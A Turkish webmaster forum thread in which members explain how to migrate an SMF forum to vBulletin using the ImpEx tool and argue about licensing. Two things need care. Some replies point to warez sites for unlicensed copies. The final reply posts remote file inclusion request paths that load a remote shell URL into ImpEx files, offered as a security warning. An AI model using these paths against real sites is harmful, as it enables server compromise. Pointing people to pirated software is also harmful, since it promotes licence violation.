İyinet'e Hoşgeldiniz!

Türkiye'nin En Eski Webmaster Forum'una Hemen Kayıt Olun!

Kayıt Ol!

SMF to Vbulletin

EBilisim

0
İyinet Üyesi
Reaction score
0
Merhaba Arkadaşlar

Forumumu SMF den Vbulletin'e Çevirmek İstiyorum. Biraz Araştırdım Netten İmplex den felan bahsediyorlar tam olarak açıklayıcı bilgi bulamadım bir yerde yardımcı olabilirseniz çok sevinirim

teşekkürler

CyberTurk

0
İyinet Üyesi
Reaction score
3
Impex ; vBulletin (Jelsoft) firması tarafından geliştirilen bir ara geçiş scriptidir. Forum olarak farklı bir script kullanıyorsanız ve vBulletin 'e geçiş yapmayı düşünüyorsanız; forumunuzdaki bilgileri (üyeler, konular, eklentiler vs...), yeni vBulletin'e aktarmayı sağlayan bir scripttir. Normalde manuel olarak db'deki tablolardaki bilgileri vBulletin'e taşıyamazsınız; çünkü farklı scriptlerdeki db tablo yapıları da farklıdır. Ve normal SQL query şeklinde transfer etmek zordur. Impex ile bu farklı db'ler arasında farklı taban kodlar kullanılarak bağlantı kurulur ve gerekli bilgiler uygun bir şekilde dönüştürülerek vBulletin db yapısına sokulur ve aktarılır.

Lisansın varsa scripte ulaşıp indirip kullanabilirsin

EBilisim

0
İyinet Üyesi
Reaction score
0
@CyberTurk

Çok Teşekkürler. Çektiğimiz Dosyayı FTP ye Atmamız ve Çalıştırmamız Yeterlimi İşlem İçin ?

Hostmaster

0
İyinet Üyesi
Reaction score
0
Impexin konfigürasyon dosyalarında birkaç değişiklik yapılacak.Sonra sırasıyla her şeyi convert ediyor.Sonra da bakımdan gerekli ayarları yapacaksınız.

Hayko

0
İyinet Üyesi
Reaction score
0
Lisansımız Yoksa napmalıyız ? İlla bu smf den vbulletine geçiş için lisans mı lazım ?

sempaty

1
İyinet Üyesi
Reaction score
19
elbetteki. yani mantık olarak öyle olması normal değil mi? yani öyle olmasa herkes önce başka bişey açar sonra vbulletine çevirirdi..

theersin

0
İyinet Üyesi
Reaction score
4
Smf to vb yaparken lisans olması şart değil düşünüyorum SMF den bir arkadaş VB ye çevirdi lisansı felan yoktu.

firar

0
İyinet Üyesi
Reaction score
0
Smf to vb yaparken lisans olması şart değil düşünüyorum SMF den bir arkadaş VB ye çevirdi lisansı felan yoktu.

ancak nasıl yapıldıgının anlatılması problem teşkil edebilir forum kurallarımız açısından her türlü lisanssız kullanımın ve teşviğin karşısındayız..

sempaty

1
İyinet Üyesi
Reaction score
19
bu böyle devam ederse bu geçiş olayını çıkartanı da dava edebilir vbulletin.

çünkü lisanslı olarak satıyor. ve birebir smf ile anlaşması yok diye biliyorum. yani neredeyse artık her yazılım arası geçiş olabiliyor. ama geçiş yaparken eski ve yeni yazılımın kullanım koşullarına uymanız gerekmektedir..

CyberTurk

0
İyinet Üyesi
Reaction score
3

Lisansız VB kullanmak yasak arkadaşım. Çevirmek ayrıca yasak olsa ne yazar olmasa ne yazar. Lisansın yoksa çevirip nasıl kullanmayı düşünyorsun?

O arkadaşının adresini de verirsen vbulletin.com a şikayet edeyim. Biz eşek miyiz para verip kullanıyoruz...

theersin

0
İyinet Üyesi
Reaction score
4
Lisansız VB kullanmak yasak arkadaşım. Çevirmek ayrıca yasak olsa ne yazar olmasa ne yazar. Lisansın yoksa çevirip nasıl kullanmayı düşünyorsun?

O arkadaşının adresini de verirsen vbulletin.com a şikayet edeyim. Biz eşek miyiz para verip kullanıyoruz...

Benim bileceğim bir mevzu değil eğer adresi istiyorsan benden çıkmaz.Googlede ara türk sayfalarda vBulletin diye lisansız gördüğün siteleri şikayet edebilirsin bu kadar hedefliysen.

Hostmaster

0
İyinet Üyesi
Reaction score
0
vBulletini ve impexi de marez sitelerden bulmak mümkün..Zaten bakarsanız Türklere göre impexi bırak vbulletini kullanmak için de lisans gerekli değil.

baktabul

0
İyinet Üyesi
Reaction score
0
Smf Forum Sitesini Nasıl vbulletine Tasırım ve Kaca Patlar..

Evet Ben Deneme Yanılma Bir forum Sitesi kurdum yaklasık 5-6 Ay Oldu Fakat smf Yetersız Gelıyor.. Ve siteyı Butun Icerigi İle vbulletine Tasımak Istıyorum..
seo falanda olacak ( anlamadıgım ıcın yazdım).. Bana Bu Konuda Yardımcı Olabışecek Olan Varmıdır.. Site Alexada 65,000 Civarı Uye sayısı 3500 civarı fakat site uye olmadanda gezilebiliyor... www.baktabul.com pr 5
Yada Ne Yapabilirim.. vbulletine gecmek icin Butun İcerigi Tasıyamazsam.. Sıfırdan Turkce Vbulletin nasıl Kurarım...
Hepinize Cok Tesekkur ederimmmm ( Sorularım sacma Gelebilir Cunku Bilmiyorum)

Bulutlar

0
İyinet Üyesi
Reaction score
0
IMPEX KULLANIMI

Diğer forum scriptlerinden vbulletin ' e geçişte bu ara scripti kullanırız. Nasıl olduğunu sizlere madde madde anlatıcam.

1- Öncelikle İmpex adlı ara geçiş aracı elinizde bulunmalı.

2- Vbulletini diğer sitenizle aynı hosta kuruyoruz.

3- İmpex ' in içindeki upload klasörünü vbulletinin ana dizine ve yine İmpex ' in içinde bulunan cpnav_xml dosyasını vbulletinin /includes/xml klasörüne atıyoruz.

4- İmpex ' in içindeki ImpExConfig.php dosyasını editliyoruz.

Bu bölüme vbulletin ile ilgili database bilgilerimizi yazıyoruz

Kod:
$impexconfig['target']['databasetype']  = mysql 
$impexconfig['target']['server']        = localhost 
$impexconfig['target']['user']          = k.adınız 
$impexconfig['target']['password']      = sifrenız 
$impexconfig['target']['database']      = database adı 
$impexconfig['target']['tableprefix']   =

Bu bölüme kullandığımız scriptin database bilgilerimizi yazıyoruz

Kod:
$impexconfig['source']['databasetype']  = mysql 
$impexconfig['source']['server']        = localhost 
$impexconfig['source']['user']          = k.adınız 
$impexconfig['source']['password']      = şifreniz 
$impexconfig['source']['database']      = database adı 
$impexconfig['source']['tableprefix']   =

5- Admincp ' de en üstte bulunan İmport bölümüne giriyoruz. Select Source Board Format bölümünde kullandığınız scripti seçiyorsunuz ve Select Versiyon to Export to bölümünde de vbulletin ' in kullandığınız sürümünü seçiyorsunuz ve Begin İmport diyerek başlıyoruz.

6- Sonra tabloları Start Module diyerek tek tek dönüştüyoruz.

7- Son olarakta Admincp >>> Maintenance >>> Help Repair / Optimize Tables >>> Check All Diyip Continue diyoruz ve tabloları onarıp / optimize ediyoruz.

NOT: İmpex lisanslı bi üründür. www.vbulletin.com ' dan indirebilirsiniz.

baktabul

0
İyinet Üyesi
Reaction score
0
Vbulletinin Resmi Sitesine Sordum Olur dediler... Tskr... Fakat Birde seo Denen Bir sey avrssanırım... O Ayrı Bir seymi Sunu Gordum

http://www.vbseo.com/purchase/buy-vbseo.html

BUradakı Vbulletinle seo Birliktemi Yoksa sadece Seo Denilen seymi... Vbulletine gecme istegimin sebebi Seo Dedikleri Sey zaten..tskr ederim

Hostmaster

0
İyinet Üyesi
Reaction score
0
Ayrı o ikisi.160$ vererek lisansını satın alman gerekli vbseonun.

baktabul

0
İyinet Üyesi
Reaction score
0
Tesekkur ederim.. Ben Smf Forumdan Vbulletıne geccegım ıcın.. once bır denemesını yapmak ısterım... upgrade ıslemını oncelıkle
www.forum.baktabul.com da yapmak ve eger her sey ok olursa ana dızıne tasımak ıstıyorum.. cunku butun databaseyı ımpex ıle upgrade etmem gerek gercı yapan hıc bır sıte gormedım... bu yuzden kararsız kalıyorum.. vbulletın alırsam vbulletını hangı dızıne kuracagımıda belırtmem mı gerek acaba.. sadec bır dızıne mı kurabılırız

Partizan

0
İyinet Üyesi
Reaction score
0
eger impex modulu kurarsan dikkat etmen bazi hususlar var.

ImpExModule.php
ImpExController.php
ImpExDisplay.php

Bu uc dosyada hatali includeler mevcut.

/impex/ImpExModule.php?systempath=[shell-url]cmd=id
/impex/ImpExController.php?systempath=[shell-url]cmd=id
/impex/ImpExDisplay.php?systempath=[shell-url]cmd=id

en basit heklenme yolu.. dikkat etmek gerek. koLay gelsin.

Türkiye’nin ilk webmaster forum sitesi iyinet.com'da forum üyeleri tarafından yapılan tüm paylaşımlardan; Türk Ceza Kanunu’nun 20. Maddesinin, 5651 Sayılı Kanununun 4. maddesinin 2. fıkrasına göre, paylaşım yapan üyeler sorumludur.

Backlink ve Tanıtım Yazısı için iletişime geçmek için Skype Adresimiz: .cid.1580508955483fe5